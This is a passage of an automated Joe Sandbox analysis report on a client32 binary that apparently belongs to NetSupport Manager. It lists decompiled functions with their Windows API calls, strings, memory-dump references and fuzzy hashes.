Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetUserDefaultUILanguage$kernel32.dll
API String ID: 145871493-545709139
Opcode ID: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
Instruction ID: e6235b5ae6f1dfca5c3043155b5dfa22c054f7606e96d7ad1ec578fde494cc77
Opcode Fuzzy Hash: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
Instruction Fuzzy Hash: A1F0A7317021744FE3568AB69F84AAEFAD5EB81B7AB190135E430CAA98E73488408765

Function 110BDB80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000,750A7D59,?,110BDC96,?,00000000,?,110BFF9C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110BDBA5
GetSubMenu.USER32(00000000,00000002,?,110BDC96,?,00000000,?,110BFF9C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110BDBBD
DrawMenuBar.USER32(00000000,?,110BDC96,?,00000000,?,110BFF9C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110BDBD1

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BDB8F
m_hWnd, xrefs: 110BDB94

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 381722633-2830328467
Opcode ID: 7793b4124eab6fba1871c3bc9272eb7fe89a90c363d1f3ab0ff0b90efc26d385
Instruction ID: 3e24fc11817a54fd320548bffb7fb36e34be41f0dee8520d909056115beef515
Opcode Fuzzy Hash: 7793b4124eab6fba1871c3bc9272eb7fe89a90c363d1f3ab0ff0b90efc26d385
Instruction Fuzzy Hash: 34F02779A10324ABC724DB309C49F5EB2E4AB4871CF00083DF122A2580DB74A4048359

Function 110ED0D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 110ED0D9
SendMessageA.USER32(00000000,0000045B,11020C43,00000000,?,11020C43,00000000,00000001), ref: 110ED10D
SendMessageA.USER32(00000000,00000445,00000000,04000000,?,11020C43,00000000,00000001), ref: 110ED11C

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

IsWindow(hRich), xrefs: 110ED0ED
..\CTL32\NSWin32.cpp, xrefs: 110ED0E8

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
API String ID: 2446111109-1196874063
Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED

Function 1115F1F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
GlobalDeleteAtom.KERNEL32 ref: 1115F212
GlobalDeleteAtom.KERNEL32 ref: 1115F21C
SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C

Strings

qu, xrefs: 1115F22C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomDeleteGlobal$LongWindow
String ID: qu
API String ID: 964255742-2766958120
Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70

Function 11017420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32 ref: 11017428
GetWindowLongA.USER32(00000000,000000F0), ref: 11017437
PostMessageA.USER32 ref: 11017458
SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B

Strings

IPTip_Main_Window, xrefs: 11017423

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$FindLongPostSend
String ID: IPTip_Main_Window
API String ID: 3445528842-293399287
Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698

Function 110698D0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 119COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,B24479DC), ref: 11069909

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

LeaveCriticalSection.KERNEL32(?,?), ref: 110699DC
LeaveCriticalSection.KERNEL32(?), ref: 11069A07

Strings

Client, xrefs: 11069950
Buffers, xrefs: 11069942

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter__wcstoi64
String ID: Buffers$Client
API String ID: 1723449611-673521604
Opcode ID: 47014f8817006754412782fa05321fcc3cdc61410f013134229025b7891f35c6
Instruction ID: 6e52f73104c3b5384aab9ec7da9b21e4f26a08b532b87f3f1e7b4992386e0f41
Opcode Fuzzy Hash: 47014f8817006754412782fa05321fcc3cdc61410f013134229025b7891f35c6
Instruction Fuzzy Hash: E1415A75A04209AFDB14CFA8C880B9EF7F9EF88704F20855DE515DB785DB75A901CB90

Function 110CF7D0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 110CEDF0: EnterCriticalSection.KERNEL32(00000000,00000000,B24479DC,00000000,00000000,00000000,110CF110,?,00000001), ref: 110CEE2A
Part of subcall function 110CEDF0: LeaveCriticalSection.KERNEL32(00000000), ref: 110CEE92

IsWindow.USER32(?), ref: 110CF82B

Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339

RemovePropA.USER32(?), ref: 110CF858
DeleteObject.GDI32(?), ref: 110CF86C
DeleteObject.GDI32(?), ref: 110CF876
DeleteObject.GDI32(?), ref: 110CF880

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
String ID:
API String ID: 1921910413-0
Opcode ID: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
Instruction ID: ad97ac124b8baf06b1bc187428558142c09e0612fd1a0aa1ed86d22d24e6cfad
Opcode Fuzzy Hash: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
Instruction Fuzzy Hash: 0C316BB1A007559BDB20DF69D940B5BBBE8EB04B18F000A6DE862D3690D775E404CBA2

Function 11081590 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11081616
wsprintfA.USER32 ref: 1108164D

Strings

..\CTL32\DataStream.cpp, xrefs: 1108165E
m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
%02x, xrefs: 11081610

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
API String ID: 2111968516-476189988
Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60

Function 1111F440 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6

SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
DeleteObject.GDI32(?), ref: 1111F4E4
DeleteObject.GDI32(?), ref: 1111F4F1
DeleteObject.GDI32(?), ref: 1111F516

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DeleteObject$PaletteSelect
String ID:
API String ID: 2820294704-0
Opcode ID: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
Opcode Fuzzy Hash: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1

Function 110259C0 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32 ref: 110259D7
GetDlgItem.USER32(?,00001399), ref: 11025A11
TranslateMessage.USER32(?), ref: 11025A2A
DispatchMessageA.USER32(?), ref: 11025A34
GetMessageA.USER32 ref: 11025A76

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchItemTranslate
String ID:
API String ID: 1381171329-0
Opcode ID: 00341069dc38fbb4dfc00e2e7f471a471adeab46effe85cccc881b86fc4bfeea
Instruction ID: 1d3eb3fe4f0069694488dcbc6a13b2e6f5653f41aef2ba1524fd952247bef68a
Opcode Fuzzy Hash: 00341069dc38fbb4dfc00e2e7f471a471adeab46effe85cccc881b86fc4bfeea
Instruction Fuzzy Hash: 9721D171E0030B5BE714DAA1CC85BEFB7E8AF44308F404029EA2797580FA75E401CB94

Function 1104F179 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 69sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9

Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
Sleep.KERNEL32(00000032), ref: 1104F383

Strings

Global\Client32Provider, xrefs: 1104F1BB
error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
API String ID: 3682529815-1899068400
Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12

Function 11163964 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 11163972

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

_free.LIBCMT ref: 11163985

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 77676965e9e40f6af87a66b0b8311ab755c02a438921afc9ee71fd3014ec5639
Instruction ID: 99a0502aaeb7ade96a4deef53194f79690bd7c081ca6f8299ad08a7ab0eaa67e
Opcode Fuzzy Hash: 77676965e9e40f6af87a66b0b8311ab755c02a438921afc9ee71fd3014ec5639
Instruction Fuzzy Hash: 6D110837618637AADB121B74A808649FB9CAF843F8B214126E85D96140FEB2D460CF90

Function 110B3950 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

